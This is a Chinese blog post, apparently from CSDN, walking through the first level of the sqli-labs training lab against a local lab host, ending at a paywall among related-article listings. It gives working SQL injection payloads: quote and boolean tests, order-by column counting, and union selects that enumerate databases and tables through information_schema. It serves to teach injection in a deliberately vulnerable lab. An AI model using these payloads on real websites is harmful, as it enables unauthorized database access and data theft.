sqli-lab通关笔记

最新推荐文章于 2024-07-27 09:00:00 发布
最新推荐文章于 2024-07-27 09:00:00 发布
阅读量2.6k 收藏
点赞数 1
分类专栏: sqli-lab通关 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SYJ_361/article/details/121946942
版权

sqli-lab通关笔记前6关

文章目录

Less-1–基于单引号的字符型注入

配置信息

​ 在Lsee-1目录下的index.php中配置

echo $sql;
echo "<br>";

用于在网页显示sql语句

初始界面

上面提示:

Please input the ID as parameter with numeric value

意思是我们应该输入一个ID信息

输入ID后的界面

  1. 首先,按F12–【hackbar】

  2. 然后,Load加载网页地址到URL上

  3. 在URL上输入【 ?id=1】

  4. 然后点击【EXECUTE】按钮

  5. 结果如下所示,

  6. 成功登录,显示数据库中id=1的信息

    image-20211210170337545

注意

输入ID值,可以依次查看数据库中ID信息

判断是否有漏洞法1

在ID值后面加上单引号 【’】,即可判断是否有漏洞

情况如下所示

判断出有SQL语句错误,说明有SQL漏洞

image-20211210191612943

测试
http://192.168.81.135/sqli/Less-1/?id=1' or 1=1 --+

显示正确结果

注意

–+:结束符

–:注释符

#:注释符

数据库中的查询语句为

select * from users where id='1' or 1=1--' limit 0,1;

其中

limit 0,1:

​ 0:表示从0位置开始,

​ 1:为步长,表示几个

image-20211210193431229

判断漏洞法2

  • 首先注入语句

    ?id=1' and 1=1--+

    正常登录不报错

    image-20211210194326860

  • 然后把1=1改为1=2

    ?id=1' and 1=2--+

    不显示任何信息(说明有注入漏洞)

    image-20211210194433873

注入字符判断列数

注:

  • 超出列数会报错

  • 二分查找试出列出

    • 经实验列数为3

    • http://192.168.81.135/sqli/Less-1/?id=1' order by 3 --+

image-20211210194656714

image-20211210194809388

判断数据显示点

ID一定要改为0或其他非正整数即可(x也可以)

http://192.168.81.135/sqli/Less-1/?id=0' union select 1,2,3 --+

image-20211210195031504

注入字符后加sql注入基本语句

查看当前数据库
http://192.168.81.135/sqli/Less-1/?id=0' union select 1,2,database() --+

image-20211210195301761

根据数字位置查看数据库
http://192.168.81.135/sqli/Less-1/?id=0' union select 1,2,schema_name from information_schema.schemata limit 0,1 --+

改变0的数字大小即可查看对应数据库中名字

image-20211210195940179

image-20211210200009304

查看所有数据库
http://192.168.81.135/sqli/Less-1/?id=0' union select 1,2,group_concat(schema_name) from information_schema.schemata--+

group_concat():从分组后的字段中选出函数内的字段值

image-20211210201058070

查表
http://192.168.81.135/sqli/Less-1/?id=0' union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1--+

0x7365637572697479:security的16进制

limit后面的数字

最低0.47元/天 解锁文章
小小西贝
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-lab通关txt
07-22
在这个sqli-lab通关txt文件中,我们预计会找到一系列关于SQL注入攻击的实战教程,主要涵盖了从基础到进阶的10个不同阶段的练习。 SQL注入通常发生在Web应用中,当用户输入的数据没有被正确地过滤或转义,导致这些...
Sqli-Labs 通关笔记
m0_43397796的博客
08-07 2432
Sqli-Labs靶场
详细sqli-labs(1-20)通关讲解
m0_57928318的博客
05-18 1546
获取数据库名时可以使用 left() 函数,这里使用 substr() 函数截取数据库名的每个字符,然后使用 ASCII() 函数判断这个字符的 ASCII 码值。我们可以看出,GET 方式和post 方式 的区别,GET方式 可以明显的 从 URL 中进行注入,POST可以在数据包中进行修改对应的字段来进行 SQL 注入。获取数据库名时,使用 LEFT() 函数进行穷举法的效率较低,使用 substr() 函数结合 ASCII() 函数进行判断可以使用二分法快速缩小范围。
sqli-lab 1-16通关笔记
m0_52361291的博客
06-08 295
前段时间大概学了一遍内网,免杀正好来将web这块重新复习一遍 由于是直接刷关所以只是让关卡报出注入点其余的都没搞。首先明确SQL注入产生的原理是传递结构化语言时影响了数据库的执行叫做SQL注入。这些关卡都是统一的get型注入而且都是通过联合查询的 代码中通过mysql_query()和mysql_fetch_array()这两个函数先执行查询语句然后再将同一行的数据以数组形式输出,调用数据库列名称来呈现查询结果而mysql_error()这个函数的作用是输出mysql数据库报错的信息这也是做联合查询时的一个
sqli-labs 通关笔记详解 Less1 - Less10
HAKUNAMATATATTA的博客
12-18 2820
sqli-labs靶场之前建议补一下基础。
sqli-lab教程——1-35通关Writeup
热门推荐
地址ch3nye.top
09-11 10万+
刚做sqli-lab的时候,我逛了几个博客论坛没找到什么特别完整的教程,在这里写一篇更完整的教程。 本教程中使用到的大部分函数可以在我的 sql注入入门必备基础知识中找到具体说明和使用方法。 一些术语使用错误请见谅。 一些题目有多种方法,本人也是在学习当中,我会尽可能补全,但是精力有限,文章不尽完美,请见谅。 目录 Page-1(Basic Challenges) Less-1 ...
sqli-lab第17~22关通关笔记
m0_52361291的博客
06-12 427
本来今天是说要到第25关的但是到了第23关我太菜了实在没看出来要咋做,用sqlmap跑了一下是利用延时注入的payload,我一开始想的是跟前面一样用的是联合注入,看了一下源代码也没看出来啥原因导致用的延时所以先休息总结一下前面的,23关明天搞。在1~4关中sqlmap直接注入就行了 而在5~8关中由于是布尔型注入所以在使用sqlmap注入时要加上 --technique B参数面对其他类型的盲注对应的参数是 在第9~10关中是延时注入所以用到了 --technique T参数 11~16关都是po
SQLI-labs 通关笔记】靶场安装
fyrmaryt的博客
02-27 595
SQLI-labs通关笔记之安装及介绍篇。
Sqli-lab教程-史上最全详解(1-22通关
wangluoanquan111的博客
04-20 777
Less-1 联合注入Less-2Less-3Less-4Less-5 报错注入/布尔盲注/时间盲注Less-6 报错注入/布尔盲注/时间盲注Less-7 文件导出Less-8 布尔盲注/时间盲注Less-9 时间盲注Less-10 时间盲注Less-11 post注入Less-12 post注入Less-13 post盲注Less-14 post盲注Less-15 时间盲注Less-16 时间盲注Less-17 修改密码Less-18 user-agent头注入。
SQL注入从入门到进阶:sqli-labs靶场通关笔记
tzyyyyyy的博客
09-26 5500
SQL注入从入门到进阶:sqli-labs全关通关笔记 Less-1~Less64
Sqli-lab教程-史上最全详解(1-22通关)_sqlilabs
m0_60721649的博客
04-08 718
所以??id=1" and (select ascii(substr(database(),1,1))) >114 --+也行所以ascii码为115,第一位字母为s用脚本跑id=1’res = ‘’print(res)breakexit(0)得到库名:security③走流程只要修改脚本中的select语句即可。
第三节 Sqli-lab环境搭建-01
09-15
Sqli-lab环境搭建-01 在本节中,我们将讨论如何搭建Sqli-lab环境,包括安装PhpStudy环境、火狐浏览器插件、Sqlmap和Sqli-Lab等工具。这些工具将帮助我们学习SQL注入漏洞检测和利用。 PhpStudy环境安装 PhpStudy是...
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-lab操作详解
07-12
本篇文章将详细讲解SQL注入漏洞以及如何在`sqli-lab`这个实践环境中进行操作。 一、SQL注入的理解 SQL注入的基本原理是利用程序对用户输入数据的不当处理,使得恶意SQL代码能够与服务器上的数据库交互。当Web应用未...
sqli-lab注入练习源码
06-25
Sqli-lab是一个专门设计用于SQL注入学习和实践的平台,它为初学者和经验丰富的安全专家提供了多种级别的练习,帮助他们了解并掌握如何防止这种攻击。 首先,我们来详细了解SQL注入的基本原理。当Web应用程序接收...
隧道可视化:实时监控保障行车安全
最新发布
HT for Web 3D
07-27 343
通过图扑可视化实现隧道的实时监控、数据分析及智能报警系统,提供全面的隧道管理和决策支持,提升行车安全,优化维护策略,确保交通顺畅。
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 1213
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
网络安全之扫描探测阶段攻防手段(二)
子非渔
07-24 728
扫描探测阶段是攻击者对目标网络进行深入了解的关键步骤,同时也是防御者识别潜在威胁和加强安全防护的机会。
sqli-lab安装
09-05
要安装sqli-lab,您需要按照以下步骤进行操作: 1. 首先,确保您具有Web服务器环境。您可以使用Apache、Nginx或其他适合您的环境的Web服务器。 2. 下载sqli-lab的代码。您可以从GitHub存储库中获取它,链接:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值